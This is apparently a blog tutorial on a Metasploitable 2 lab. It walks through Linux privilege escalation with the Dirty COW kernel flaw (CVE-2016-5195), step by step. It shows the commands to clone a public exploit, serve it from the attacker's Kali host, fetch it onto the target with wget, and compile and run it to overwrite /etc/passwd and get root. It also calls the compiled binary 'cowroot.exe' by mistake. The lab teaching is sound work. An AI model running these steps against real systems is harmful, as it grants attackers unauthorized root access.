DISCLAIMER!
This content is intended solely for educational and ethical purposes. The tested IP that is revealed is created by me and this activity is conducted with permission. All activities related to cybersecurity must comply with available regulations. The author (me) is not responsible for any misuse or illegal activities performed using the knowledge shared here. Any actions taken by the readers using this info are at the reader’s own risk.  

Privilege Escalation: Dirty COW Vulnerability

From the previous post, we know that there is remote exploitation and local exploitation. Today, we will explore one of the well-known vulnerabilities used for local exploitation (to gain root privilege), Dirty COW (Copy On Write).

Image source: https://en.wikipedia.org/wiki/Dirty_COW

 

Dirty COW is a vulnerability on the Linux Kernel that affects all Linux-based OS. It exploits the copy-on-write mechanism in the kernel’s memory management subsystem and enables local privilege escalation. In other words, unprivileged local users can escalate to root by exploiting this vulnerability. The CVE number for this vulnerability is CVE-2016-5195. 

First, we need to exploit the target shell (we can use vsftpd or other vulnerabilities). For this practice, I will directly use the shell in Metasploitable 2 (assuming that I already have prior access to the target system). Our Kali Linux IP is 192.168.1.8.

Exploitation Steps

First, in our Kali Linux, get dirty.c script by using git clone https://github.com/FireFart/dirtycow.git.

After that, start a http server to enable file sharing to the target system by using the command python3 -m http.server 8000. Now, we can access the file from http://<kali IP>:8000/dirty.c. Here, we can see the 192.168.1.7 (target IP) is requesting something from our Kali Linux because we try to get that dirty.c in the target system.

 

To get the malicious script, in the target system, we need to first check the connection of this target to our IP by typing ping <kali IP>.

If it is okay, then we can try to get the dirty.c from our Kali Linux by using wget http://<kali IP>:8000/dirty.c.

 

After the download is successful, we execute the script using these commands:

gcc -pthread dirty.c -lcrypt -o cowroot (compile the file using gcc, link the thread library using -pthread, dirty.c is the C source file, -lcrypt is to link the libcrypt library used for generating a new password hash for /etc/passwd overwrite, and -o cowroot means the output will be named as cowroot.exe)

chmod +x cowroot (this makes the cowroot file executable)

./cowroot  (run the cowroot file in the current directory)

 

We can enter a new password to our new user and we can use it to explore more into the system because it has escalated privilege.

 

Now, we can see that the new user firefart can escalate their privilege into root. The picture below shows that first we are still normal user (labeled by the $ sign), but after we login as firefart, we have root privilege (labeled by the # sign).